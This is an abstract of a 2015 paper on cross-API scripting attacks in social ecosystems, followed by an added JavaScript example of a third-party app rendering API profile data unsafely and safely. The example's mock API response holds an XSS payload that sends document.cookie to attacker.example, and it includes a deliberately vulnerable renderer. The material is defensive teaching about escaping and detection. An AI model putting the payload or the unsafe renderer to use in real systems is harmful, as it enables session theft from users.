Abstract
With the rapid development of online social networks, social platforms release a variety of Web application programming interfaces (APIs) to share profitable social data with all kinds of third-party online services. These APIs also bring new risks to social networks when they are insecurely designed, implemented, or invoked. This paper focuses on the security analysis of a new type of cross-site scripting (XSS) that is carried through Web APIs in the complicated social ecosystems formed by social networks, third-party apps, and other online services; we refer to this Web API-based XSS as cross-API scripting (XAS). We are the first to use typical XAS attacks in diverse contexts as case studies to demonstrate the new exploitation opportunities and threats in social ecosystems. We also design a tool to identify design and implementation flaws in the Web APIs of 11 popular social networks; our experiments uncover several API security flaws, and from the results we analyze the root causes of XAS flaws in depth. We further examined 143 Web-based apps and verified the prevalence of XAS flaws. Finally, we propose preliminary countermeasures for both social networks and third-party applications to mitigate XAS.
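The abstract describes XAS as XSS whose injection channel is a Web API response rather than a page of the social network itself: user-controlled data leaves the social network through an API and is rendered by a third-party app that trusts it. The following is an added example written for this page, not code from the paper or from any social network; the API response and its field names are constructed and hypothetical. It shows a third-party app rendering a profile fetched through such an API in a vulnerable form beside a hardened form, plus a simple check that flags API fields carrying markup before the app trusts them.

```javascript
// Added example (not from the paper): a third-party app renders a social
// profile fetched through a Web API. If the social network does not
// sanitize the user-controlled "name" field and the app trusts it as
// HTML, the API response becomes the injection channel (cross-API
// scripting). The response below is constructed for this example; the
// field names are hypothetical, not any real social network's schema.

const apiResponse = JSON.stringify({
  id: "1001",
  name: "alice<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">",
  bio: "Hello <b>world</b>",
});

// Vulnerable: the app treats API data as trusted markup, so whatever the
// profile owner typed into "name" on the social network runs in the app's
// origin once the app sets this string as innerHTML.
function renderProfileUnsafe(json) {
  const p = JSON.parse(json);
  return `<div class="profile"><h1>${p.name}</h1><p>${p.bio}</p></div>`;
}

// Escape the five characters that matter in HTML text and attribute
// contexts. Output-encode at the sink, regardless of what the API provider
// promises about sanitizing on its side.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: every API field is escaped for the HTML context it lands in.
function renderProfileSafe(json) {
  const p = JSON.parse(json);
  return `<div class="profile"><h1>${escapeHtml(p.name)}</h1><p>${escapeHtml(p.bio)}</p></div>`;
}

// Check an app (or an API auditing tool) can run on a response before
// trusting it: which string fields carry markup-relevant characters?
// A field listed here is evidence that the API does not sanitize it.
function fieldsWithMarkup(json) {
  const p = JSON.parse(json);
  return Object.entries(p)
    .filter(([, v]) => typeof v === "string" && /[<>"']/.test(v))
    .map(([k]) => k);
}

console.log(renderProfileUnsafe(apiResponse));
console.log(renderProfileSafe(apiResponse));
console.log(fieldsWithMarkup(apiResponse)); // ["name", "bio"]
```

The point of the split between `fieldsWithMarkup` and `escapeHtml` mirrors the two sides the abstract names: the first is the kind of check an API provider or auditing tool can use to find fields that leave the social network unsanitized, the second is the defence a third-party app must apply anyway, because it cannot rely on the provider having done so.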
Zhang, Y., Liu, Q., Luo, Q. et al. XAS: Cross-API scripting attacks in social ecosystems. Sci. China Inf. Sci. 58, 1–14 (2015). https://doi.org/10.1007/s11432-014-5145-1